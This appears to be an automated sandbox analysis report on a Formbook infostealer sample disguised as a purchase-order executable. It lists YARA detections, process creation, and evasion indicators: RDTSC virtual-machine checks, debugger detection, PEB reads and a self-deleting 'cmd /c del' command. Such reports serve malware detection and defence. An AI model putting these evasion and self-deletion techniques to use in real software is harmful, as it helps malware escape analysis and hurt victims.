Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/0@17/13

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01

Source: Purchase Order 40,7045$.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Purchase Order 40,7045$.exe	Virustotal: Detection: 43%
Source: Purchase Order 40,7045$.exe	ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

File read: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
Source: unknown	Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'	Jump to behavior

Source: Purchase Order 40,7045$.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ipconfig.pdb source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: Purchase Order 40,7045$.exe, 00000000.00000003.240059107.0000000003210000.00000004.00000001.sdmp, Purchase Order 40,7045$.exe, 00000001.00000002.274071356.000000000107F000.00000040.00000001.sdmp, ipconfig.exe, 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Purchase Order 40,7045$.exe, ipconfig.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

0_2_013D7FB0

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E0595 push ecx; ret	0_2_013E05A8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013DD44F push ecx; ret	0_2_013DD462
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00415913 push edx; retf	1_2_00415915
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041AC62 push D8D19732h; iretd	1_2_0041AC69
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00414D57 push esi; retf	1_2_00414D58
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041AD65 push eax; ret	1_2_0041ADB8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00414DEA push eax; ret	1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041ADB2 push eax; ret	1_2_0041ADB8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041ADBB push eax; ret	1_2_0041AE22
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00414E7E push eax; ret	1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041AE1C push eax; ret	1_2_0041AE22
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00414E24 push eax; ret	1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0040FF92 push 00000033h; iretd	1_2_0040FF98
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FDD0D1 push ecx; ret	1_2_00FDD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02ECD0D1 push ecx; ret	5_2_02ECD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B15913 push edx; retf	5_2_02B15915
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B14E24 push eax; ret	5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1AE1C push eax; ret	5_2_02B1AE22
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B14E7E push eax; ret	5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B0FF92 push 00000033h; iretd	5_2_02B0FF98
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1AC62 push D8D19732h; iretd	5_2_02B1AC69
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1ADB2 push eax; ret	5_2_02B1ADB8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1ADBB push eax; ret	5_2_02B1AE22
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B14DEA push eax; ret	5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1AD65 push eax; ret	5_2_02B1ADB8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B14D57 push esi; retf	5_2_02B14D58

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

Source: unknown

Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000002B083D4 second address: 0000000002B083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000002B0876E second address: 0000000002B08774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 1_2_004086A0 rdtsc

1_2_004086A0

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 5636	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6160	Thread sleep time: -48000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed

Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000002.00000000.251236949.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.259375031.0000000008C73000.00000004.00000001.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.254456910.00000000069DA000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.259579486.0000000008D97000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}October%%
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 1_2_004086A0 rdtsc

1_2_004086A0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 1_2_00409900 LdrLoadDll,

1_2_00409900

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_013E032D

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

0_2_013D7FB0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013FD014 mov eax, dword ptr fs:[00000030h]	0_2_013FD014
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013FD051 mov eax, dword ptr fs:[00000030h]	0_2_013FD051
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013FD0B4 mov eax, dword ptr fs:[00000030h]	0_2_013FD0B4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013FC520 mov eax, dword ptr fs:[00000030h]	0_2_013FC520
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F858EC mov eax, dword ptr fs:[00000030h]	1_2_00F858EC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]	1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]	1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]	1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBF0BF mov ecx, dword ptr fs:[00000030h]	1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]	1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]	1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC90AF mov eax, dword ptr fs:[00000030h]	1_2_00FC90AF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89080 mov eax, dword ptr fs:[00000030h]	1_2_00F89080
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]	1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]	1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]	1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]	1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010069A6 mov eax, dword ptr fs:[00000030h]	1_2_010069A6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]	1_2_00FA0050
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]	1_2_00FA0050
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]	1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]	1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]	1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]	1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]	1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]	1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]	1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]	1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]	1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]	1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]	1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]	1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]	1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]	1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]	1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]	1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]	1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010141E8 mov eax, dword ptr fs:[00000030h]	1_2_010141E8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]	1_2_01054015
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]	1_2_01054015
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]	1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]	1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]	1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB61A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB61A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2990 mov eax, dword ptr fs:[00000030h]	1_2_00FB2990
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01051074 mov eax, dword ptr fs:[00000030h]	1_2_01051074
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01042073 mov eax, dword ptr fs:[00000030h]	1_2_01042073
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAC182 mov eax, dword ptr fs:[00000030h]	1_2_00FAC182
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA185 mov eax, dword ptr fs:[00000030h]	1_2_00FBA185
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]	1_2_01003884
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]	1_2_01003884
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]	1_2_00F8B171
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]	1_2_00F8B171
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8C962 mov eax, dword ptr fs:[00000030h]	1_2_00F8C962
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]	1_2_00FAB944
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]	1_2_00FAB944
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]	1_2_00FB513A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]	1_2_00FB513A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov ecx, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120 mov ecx, dword ptr fs:[00000030h]	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]	1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]	1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]	1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104131B mov eax, dword ptr fs:[00000030h]	1_2_0104131B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2AE4 mov eax, dword ptr fs:[00000030h]	1_2_00FB2AE4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2ACB mov eax, dword ptr fs:[00000030h]	1_2_00FB2ACB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]	1_2_00F9AAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]	1_2_00F9AAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBFAB0 mov eax, dword ptr fs:[00000030h]	1_2_00FBFAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058B58 mov eax, dword ptr fs:[00000030h]	1_2_01058B58
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]	1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]	1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]	1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]	1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]	1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]	1_2_00FBD294
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]	1_2_00FBD294
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103D380 mov ecx, dword ptr fs:[00000030h]	1_2_0103D380
